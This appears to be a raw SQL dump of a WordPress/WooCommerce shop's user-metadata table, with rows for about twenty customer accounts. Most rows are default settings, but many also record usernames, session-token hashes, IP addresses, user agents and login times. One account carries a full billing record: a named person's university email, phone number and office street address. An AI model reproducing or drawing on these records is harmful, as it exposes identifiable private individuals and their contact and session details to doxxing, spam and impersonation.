INSERT INTO `wp_usermeta` VALUES (4736, 262, 'session_tokens', 'a:1:{s:64:"dd496c4c1f2f4787416d60ff0601da4329b1c9597e80adbb97f32081882ef2ac";a:4:{s:10:"expiration";i:1483039331;s:2:"ip";s:14:"168.215.104.98";s:2:"ua";s:71:"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)";s:5:"login";i:1481829731;}}'); 
INSERT INTO `wp_usermeta` VALUES (4737, 263, 'nickname', 'anne.baker'); 
INSERT INTO `wp_usermeta` VALUES (4738, 263, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4739, 263, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4740, 263, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4741, 263, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4742, 263, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4743, 263, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4744, 263, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4745, 263, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4746, 263, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4747, 263, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4748, 263, '_yoast_wpseo_profile_updated', '1481907254'); 
INSERT INTO `wp_usermeta` VALUES (4749, 263, 'session_tokens', 'a:1:{s:64:"3c1a7030f723cc1611e891874757f6e4fd164eea13a30809dad7b51f74a93c4d";a:4:{s:10:"expiration";i:1483116855;s:2:"ip";s:15:"216.130.151.231";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481907255;}}'); 
INSERT INTO `wp_usermeta` VALUES (4750, 263, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4751, 264, 'nickname', 'tbishop'); 
INSERT INTO `wp_usermeta` VALUES (4752, 264, 'first_name', 'TERESA'); 
INSERT INTO `wp_usermeta` VALUES (4753, 264, 'last_name', 'BISHOP'); 
INSERT INTO `wp_usermeta` VALUES (4754, 264, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4755, 264, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4756, 264, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4757, 264, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4758, 264, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4759, 264, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4760, 264, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4761, 264, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4762, 264, '_yoast_wpseo_profile_updated', '1481909599'); 
INSERT INTO `wp_usermeta` VALUES (4764, 264, 'last_update', '1481909635'); 
INSERT INTO `wp_usermeta` VALUES (4765, 265, 'nickname', 'yolanda.r.gomez'); 
INSERT INTO `wp_usermeta` VALUES (4766, 265, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4767, 265, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4768, 265, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4769, 265, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4770, 265, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4771, 265, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4772, 265, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4773, 265, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4774, 265, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4775, 265, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4776, 265, '_yoast_wpseo_profile_updated', '1481911804'); 
INSERT INTO `wp_usermeta` VALUES (4777, 265, 'session_tokens', 'a:1:{s:64:"ba9ddb791ffccbfd66aff83640c6fa33d9a28dc84c8e53dbb5ab17fe8eb9727e";a:4:{s:10:"expiration";i:1483121405;s:2:"ip";s:12:"192.35.35.36";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1481911805;}}'); 
INSERT INTO `wp_usermeta` VALUES (4778, 265, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4779, 266, 'nickname', 'jxa90'); 
INSERT INTO `wp_usermeta` VALUES (4780, 266, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4781, 266, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4782, 266, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4783, 266, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4784, 266, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4785, 266, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4786, 266, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4787, 266, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4788, 266, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4789, 266, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4790, 266, '_yoast_wpseo_profile_updated', '1481918220'); 
INSERT INTO `wp_usermeta` VALUES (4791, 266, 'session_tokens', 'a:1:{s:64:"8eb32752d8ba447ef416be4c3afa9f26bfe09e52c55f99bd1937aa133cbeb608";a:4:{s:10:"expiration";i:1483127821;s:2:"ip";s:14:"129.22.143.185";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36";s:5:"login";i:1481918221;}}'); 
INSERT INTO `wp_usermeta` VALUES (4792, 266, 'billing_first_name', 'Jennifer'); 
INSERT INTO `wp_usermeta` VALUES (4793, 266, 'billing_last_name', 'Pyles'); 
INSERT INTO `wp_usermeta` VALUES (4794, 266, 'billing_company', 'Case Western Reserve University'); 
INSERT INTO `wp_usermeta` VALUES (4795, 266, 'billing_email', 'jxa90@case.edu'); 
INSERT INTO `wp_usermeta` VALUES (4796, 266, 'billing_phone', '2163682054'); 
INSERT INTO `wp_usermeta` VALUES (4797, 266, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (4798, 266, 'billing_address_1', '10900 Euclid Avenue'); 
INSERT INTO `wp_usermeta` VALUES (4799, 266, 'billing_address_2', 'DMSE Dept White Bldg Rm 408'); 
INSERT INTO `wp_usermeta` VALUES (4800, 266, 'billing_city', 'Cleveland'); 
INSERT INTO `wp_usermeta` VALUES (4801, 266, 'billing_state', 'OH'); 
INSERT INTO `wp_usermeta` VALUES (4802, 266, 'billing_postcode', '44106'); 
INSERT INTO `wp_usermeta` VALUES (4803, 266, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4804, 267, 'nickname', 'krecsmarik.gabor'); 
INSERT INTO `wp_usermeta` VALUES (4805, 267, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4806, 267, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4807, 267, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4808, 267, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4809, 267, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4810, 267, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4811, 267, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4812, 267, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4813, 267, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4814, 267, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4815, 267, '_yoast_wpseo_profile_updated', '1482046166'); 
INSERT INTO `wp_usermeta` VALUES (4817, 268, 'nickname', 'mcarandang'); 
INSERT INTO `wp_usermeta` VALUES (4818, 268, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4819, 268, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4820, 268, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4821, 268, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4822, 268, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4823, 268, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4824, 268, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4825, 268, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4826, 268, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4827, 268, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4828, 268, '_yoast_wpseo_profile_updated', '1482109568'); 
INSERT INTO `wp_usermeta` VALUES (4830, 269, 'nickname', 'maurice.judkins'); 
INSERT INTO `wp_usermeta` VALUES (4831, 269, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4832, 269, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4833, 269, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4834, 269, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4835, 269, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4836, 269, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4837, 269, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4838, 269, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4839, 269, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4840, 269, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4841, 269, '_yoast_wpseo_profile_updated', '1482158574'); 
INSERT INTO `wp_usermeta` VALUES (4842, 269, 'session_tokens', 'a:1:{s:64:"0c4e74e330fe766037175412ce46b057ca7355ade4bdc716611811522441c6ff";a:4:{s:10:"expiration";i:1483368175;s:2:"ip";s:12:"152.133.7.64";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482158575;}}'); 
INSERT INTO `wp_usermeta` VALUES (4843, 269, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4844, 270, 'nickname', 'jazmin.porcayo'); 
INSERT INTO `wp_usermeta` VALUES (4845, 270, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4846, 270, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4847, 270, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4848, 270, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4849, 270, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4850, 270, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4851, 270, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4852, 270, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4853, 270, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4854, 270, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4855, 270, '_yoast_wpseo_profile_updated', '1482177164'); 
INSERT INTO `wp_usermeta` VALUES (4857, 271, 'nickname', 'steven.r.burris'); 
INSERT INTO `wp_usermeta` VALUES (4858, 271, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4859, 271, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4860, 271, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4861, 271, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4862, 271, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4863, 271, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4864, 271, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4865, 271, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4866, 271, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4867, 271, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4868, 271, '_yoast_wpseo_profile_updated', '1482179117'); 
INSERT INTO `wp_usermeta` VALUES (4870, 272, 'nickname', 'martelino'); 
INSERT INTO `wp_usermeta` VALUES (4871, 272, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4872, 272, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4873, 272, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4874, 272, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4875, 272, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4876, 272, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4877, 272, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4878, 272, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4879, 272, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4880, 272, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4881, 272, '_yoast_wpseo_profile_updated', '1482217583'); 
INSERT INTO `wp_usermeta` VALUES (4882, 272, 'session_tokens', 'a:1:{s:64:"07fe79e0e4c1c59a251833dda896cdd8a6259930cb53f91736091b217054b54f";a:4:{s:10:"expiration";i:1502341850;s:2:"ip";s:12:"86.98.29.183";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36";s:5:"login";i:1502169050;}}'); 
INSERT INTO `wp_usermeta` VALUES (4883, 273, 'nickname', 'zayyanc'); 
INSERT INTO `wp_usermeta` VALUES (4884, 273, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4885, 273, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4886, 273, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4887, 273, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4888, 273, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4889, 273, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4890, 273, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4891, 273, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4892, 273, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4893, 273, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4894, 273, '_yoast_wpseo_profile_updated', '1482246953'); 
INSERT INTO `wp_usermeta` VALUES (4897, 274, 'nickname', 'kdlarsen'); 
INSERT INTO `wp_usermeta` VALUES (4898, 274, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4899, 274, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4900, 274, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4901, 274, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4902, 274, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4903, 274, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4904, 274, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4905, 274, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4906, 274, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4907, 274, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4908, 274, '_yoast_wpseo_profile_updated', '1482252315'); 
INSERT INTO `wp_usermeta` VALUES (4910, 274, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (4911, 275, 'nickname', 'robert.vela3'); 
INSERT INTO `wp_usermeta` VALUES (4912, 275, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4913, 275, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4914, 275, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4915, 275, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4916, 275, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4917, 275, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4918, 275, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4919, 275, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4920, 275, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4921, 275, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4922, 275, '_yoast_wpseo_profile_updated', '1482260666'); 
INSERT INTO `wp_usermeta` VALUES (4923, 275, 'session_tokens', 'a:1:{s:64:"e994e379d2752a639b4a078016c2f0794614f92753a9f00eb59d3122dcb3f880";a:4:{s:10:"expiration";i:1483470268;s:2:"ip";s:14:"134.132.52.220";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482260668;}}'); 
INSERT INTO `wp_usermeta` VALUES (4925, 276, 'nickname', 'hawkrequest'); 
INSERT INTO `wp_usermeta` VALUES (4926, 276, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4927, 276, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4928, 276, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4929, 276, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4930, 276, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4931, 276, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4932, 276, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4933, 276, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4934, 276, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4935, 276, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4936, 276, '_yoast_wpseo_profile_updated', '1482274516'); 
INSERT INTO `wp_usermeta` VALUES (4937, 276, 'session_tokens', 'a:1:{s:64:"c2b356e3ffa25fd87ef4aae4435965280934a60b1246d36d690e57c3c2e1914c";a:4:{s:10:"expiration";i:1503500983;s:2:"ip";s:14:"119.82.105.194";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36";s:5:"login";i:1503328183;}}'); 
INSERT INTO `wp_usermeta` VALUES (4938, 277, 'nickname', 'sdouglas'); 
INSERT INTO `wp_usermeta` VALUES (4939, 277, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4940, 277, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4941, 277, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4942, 277, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4943, 277, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4944, 277, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4945, 277, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4946, 277, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4947, 277, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4948, 277, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4949, 277, '_yoast_wpseo_profile_updated', '1482281211'); 
INSERT INTO `wp_usermeta` VALUES (4950, 277, 'session_tokens', 'a:1:{s:64:"1307dd2b58d461957fd1189495b2ff941ef6c0f3d8ef515e3053aec8268f0de8";a:4:{s:10:"expiration";i:1497736498;s:2:"ip";s:14:"104.129.192.79";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1497563698;}}'); 
INSERT INTO `wp_usermeta` VALUES (4951, 278, 'nickname', 'christoph.begemann'); 
INSERT INTO `wp_usermeta` VALUES (4952, 278, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4953, 278, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4954, 278, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4955, 278, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4956, 278, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4957, 278, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4958, 278, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4959, 278, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4960, 278, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4961, 278, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4962, 278, '_yoast_wpseo_profile_updated', '1482320669'); 
INSERT INTO `wp_usermeta` VALUES (4963, 278, 'session_tokens', 'a:1:{s:64:"afdc076da1e98cb1e4b070506aea24d5cad144d7345e91335fa5d31d52adcf65";a:4:{s:10:"expiration";i:1483530270;s:2:"ip";s:12:"193.24.32.46";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482320670;}}'); 
INSERT INTO `wp_usermeta` VALUES (4964, 279, 'nickname', 'erikancleary'); 
INSERT INTO `wp_usermeta` VALUES (4965, 279, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4966, 279, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4967, 279, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4968, 279, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4969, 279, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4970, 279, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4971, 279, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4972, 279, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4973, 279, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4974, 279, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4975, 279, '_yoast_wpseo_profile_updated', '1482329405'); 
INSERT INTO `wp_usermeta` VALUES (4976, 279, 'session_tokens', 'a:1:{s:64:"e7e867a758f7cdaa2c4a70650293078c875e9097d4adf4fb66d50a2098879135";a:4:{s:10:"expiration";i:1483539006;s:2:"ip";s:14:"192.104.67.221";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482329406;}}'); 
INSERT INTO `wp_usermeta` VALUES (4977, 280, 'nickname', 'ryan.hunter'); 
INSERT INTO `wp_usermeta` VALUES (4978, 280, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4979, 280, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4980, 280, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4981, 280, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4982, 280, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4983, 280, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4984, 280, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4985, 280, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4986, 280, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (4987, 280, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (4988, 280, '_yoast_wpseo_profile_updated', '1482333488'); 
INSERT INTO `wp_usermeta` VALUES (4990, 281, 'nickname', 'daphane.robinson-winfrey'); 
INSERT INTO `wp_usermeta` VALUES (4991, 281, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4992, 281, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (4993, 281, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (4994, 281, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4995, 281, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (4996, 281, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (4997, 281, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (4998, 281, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (4999, 281, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5000, 281, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5001, 281, '_yoast_wpseo_profile_updated', '1482335130'); 
INSERT INTO `wp_usermeta` VALUES (5002, 281, 'session_tokens', 'a:1:{s:64:"1b98e3300bd8852e64ed1f372980e7064a23a7a5a557246b251e60168f7c480e";a:4:{s:10:"expiration";i:1483544730;s:2:"ip";s:12:"199.64.6.153";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482335130;}}'); 
INSERT INTO `wp_usermeta` VALUES (5003, 281, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5004, 282, 'nickname', 'yamileth.panesso'); 
INSERT INTO `wp_usermeta` VALUES (5005, 282, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5006, 282, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5007, 282, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5008, 282, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5009, 282, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5010, 282, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5011, 282, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5012, 282, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5013, 282, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (5014, 282, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (5015, 282, '_yoast_wpseo_profile_updated', '1482335347'); 
INSERT INTO `wp_usermeta` VALUES (5016, 282, 'session_tokens', 'a:1:{s:64:"816a79c942a212f3f48e1587ec83744b3968c4c08e8771f8e5001028d623ef99";a:4:{s:10:"expiration";i:1483544948;s:2:"ip";s:13:"64.129.221.34";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1482335348;}}'); 
INSERT INTO `wp_usermeta` VALUES (5017, 282, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (5018, 283, 'nickname', 'joliver'); 
INSERT INTO `wp_usermeta` VALUES (5019, 283, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5020, 283, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (5021, 283, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (5022, 283, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5023, 283, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (5024, 283, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (5025, 283, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (5026, 283, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (5027, 283, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
